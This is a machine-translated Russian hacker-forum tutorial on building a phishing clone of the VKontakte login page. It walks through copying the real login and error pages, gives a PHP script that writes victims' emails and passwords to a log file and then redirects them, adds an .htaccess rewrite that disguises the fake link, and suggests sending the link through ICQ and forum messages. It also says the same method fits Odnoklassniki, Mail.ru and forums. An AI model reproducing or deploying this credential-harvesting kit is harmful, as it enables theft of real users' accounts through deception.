special

  1. HOME
  2. Хакерство и защита
  3. Как сделать Фейк сайт

This webpage has been robot translated, sorry for typos if any. To view the original content of the page, simply replace the translation subdomain with www in the address bar or use this link.

Фейк на скорую руку

[iNtrO]

Делать было нечаго,дело было вечером....Собственно на первую мою статью (первую на античате), потянул меня тот факт, что в разделе купи/продай/обменя/кинь по крупному есть тема, в которой один хеккер продовал фейки аж по 10 вмз, да и часто просят создать тот или иной фейк...
Я же расскажу одной статьей как можно забацать универсальный фейк почти подо все, что угондо! Покажу на примере фейка вконтакте.

[SeaRchINg]

И так, 1 что нам нужно, так это выбрать жертворесурс и собрать всю нужную нам инфу,а нам нужна толька копия некоторых страниц.Идем на vkontakte.ru через Operu (!). Жмякаем кнопочку вход, попадаем на логин.пхп, ее и возьмем за индекс нашего фейка. Жмем в опере: Фаил-->Сохранить как-->В открывшимся диалоге под названием выбираем (по умолчанию там стоит Веб Архив....) "HTML Фаил с изображениями", и обезательно графу Имя Файла пишем index (или login.htm- в зависимости от страницы)


Далее вводим туда нереальные данные и попадаем на страницу, на которой написано
Такой почтовый адрес не зарегистрирован, либо пароль неверный.
Сохраняем ее точно так же, только вместо index пишем bad.
Далее вбиваем в Google.ru фразу Vkontakte.ru, жмем Дополнительные результаты с vkontakte.ru » и ищим что-то связанное с эрором контакта... На вторйо страницы я нашел VKontakte | Error (http://vkontakte.ru/blank.php?code=10)- запоминаем,нам понадобиться эта ссылка
Усе, все что нам надо для фейка от ресурса, у нас уже есть.

[CoDiNg]

Такс, теперь иследуем форму логина. Открываем наш index.html и ищем форму входа.
<form method="post" name="login" id="login" action="login.php">

 <input type="hidden" name="success_url" id="success_url" value="">
 <input type="hidden" name="fail_url" id="fail_url" value="">

 <input type="hidden" name="try_to_login" id="try_to_login" value="1">
 <table align="center" cellpadding=0 cellspacing=7 border=0 width="40%">

 <tr>
 <td width="100px">
 <span class="grey">Email:</span>
 </td>
 <td>

 <input class="inputText" type="text" name="email" value="" id="email" size="25" />

 <td>
 </tr>
 <tr>
 <td>
 <span class="grey">Пароль:</span>

 </td>
 <td>
 <input class="inputText" type="password" name="pass" value="" id="pass" size="25" />

 </td>
 </tr>
 
 <tr>
 <td>
 &nbsp;
 </td>
 <td>

 <input style="margin-top:1px; vertical-align: middle;" type="checkbox" name="expire" id="expire" value="1" /><small>Чужой компьютер</small>

 </td>
 </tr>
 <tr>
 <td>
 &nbsp;
 </td>
 <td>
Отсюда запоминаем 3 вещи:
<form method="post" name="login" id="login" action="login.php">
<input class="inputText" type="text" name="email" value="" id="email" size="25" />
<input class="inputText" type="password" name="pass" value="" id="pass" size="25" />
Именно в этих 3 вещах заключаеться первая часть уникальности, на любой социалке или эмайле или еще где либо, везде форма входа(поля), будут в таком види (ну только название полей будит отличаться),к примеру у однокласников это
<input id="field_password" value="" style="width: 170px;" type="password" size="20" name="st.password">
Тоесть просто отличаеться название полей, элементами дизайна-но функция у всех одна и таже.
Теперь мы создаем пхп файл, и называем его к примеру login.php,его содержимое:

PHP Код:
<?php

/*

#############

#by_NoNameZ#

###########

*/

$f=fopen("log.txt","at"); 

flock($f,2); 

if(preg_match("/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/i"$_POST['email'])&& !empty($_POST['password'])){

fputs($f$_POST['email'].";".$_POST['password']." \n");

     header("Location: http://");

} else {

     header("Location: http://");

}

flock($f,3); 

fclose($f); 

?>
Собственно смотрим на скрипт, пару строчег, но это вполне нормальный фейк,его функционал:
Сохранение передаваемых переменных,их проверка,редирект в зависимости от проверки.

И так, теперь возвращаемся к тем 3 строчкам:
<form method="post" name="login" id="login" action="login.php">
тут у нас все в порядки,имя нашего скрипта совподает с именем ихнего, нобывает что и не совпадет, тогда заменяем его или же переиминовываем наш.
<input class="inputText" type="text" name="email" value="" id="email" size="25" />
<input class="inputText" type="password" name="pass" value="" id="pass" size="25" />
Отсюда нам нужно name="email" и name="pass"
Вставляем их в наш скрипт в нужное место
<?php

/*

#############

#by_NoNameZ#

###########

*/

$f=fopen("log.txt","at"); 

flock($f,2); 

if(preg_match("/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/i"$_POST['email'])&& !empty($_POST['pass'])){

fputs($f$_POST['email'].";".$_POST['pass']." \n");

     header("Location: http://");

} else {

     header("Location: http://");

}

flock($f,3); 

fclose($f); 

?>
Кто не заметил, это $_POST['email'] и $_POST['pass']

Далее смотрим скрип, тут стаит функция IF ELSE, и прегматч, тоесть если поле эмайл соотвествует эмайлу(ника@мыло.ру, а не как водят ывпмдвгк), и поле пароль не пустое, то выполняеться первый редирект, если же эмаил не соответствует или поле пасс пустое, то на второй редирект. Из этого следует,что если челл ввел мыло и что-то похожее на пасс, то кидаем его на страницу с эрором http://vkontakte.ru/blank.php?code=10, а если ввел херню (вот тут нам и понадобилась копия страницы bad.html?когда мы вводили неверные данные), то кидаем его обратно, тоесть вписываем bad.htm.

PHP Код: 
<?php

/*

#############

#by_NoNameZ#

###########

*/

$f=fopen("log.txt","at"); 

flock($f,2); 

if(preg_match("/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/i"$_POST['email'])&& !empty($_POST['pass'])){

fputs($f$_POST['email'].";".$_POST['pass']." \n");

     header("Location: http://vkontakte.ru/blank.php?code=10");

} else {

     header("Location: bad.htm");

}

flock($f,3); 

fclose($f); 

?>
Сохраняем.Заливаем всю лабуду на сервер(login.php,index.htm+папка с файлами,bad.htm+папка с файлами),создаем файил log.txt(советую свое уникальное имя придумать. не забудьте в скрипте сменить),ставим на него chmod777.

3) небольшой апдейт...

Этот апдейт подойдет очень дл СИ,в корне на фтп создаем фаил .htaccess со следующим содержанием:

RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_URI} !index\.htm
RewriteRule (.*) index.htm? [QSA]

ВНИМАНИЕ!!!
!index\.htm-на этот фаил ссылаеться редирект, если же у вас фейк допустим login.html. то соответственно вам нужно переиминовать индекс в логин.

Такс, данный фаил нам дает ссылку более качественно газлива, а именно:
вашфейк.ру/любой текст, тобишь зная ссылку структуру согдаваемого фейка, к примеру контакта, мы можем сделать так:


вашфейк.ру/photos.php?act=show&id=15884695_588954334&uid=359648756&self=6
и впарить это по аське)))согласитесь. менее заметен теперь фейк))

Вот и все

[THe eND]Собственно что уникального, а то что вы можете зайти на на одноклассников, так же сохранить страницу,вписать переменные,заменить урлы( вот сразу даю http://odnoklassniki.ru/dk?st.cmd=error) и все, обсолютно так же зайти на майил.ру, сохранить переменные и заменить и все))) Единственное, что вам может понадобиться-это креативность, добустим сохранять не главную страницу, а страницу входа.Вы так же можете сделать любой форум, если вы допустим хотите получить акк(отправляете в пм
<a href="фейк">ссылка на тему</a>
, а в фейке указываете эту тему для редиректа.

Дата створення/оновлення: 25.05.2018

';>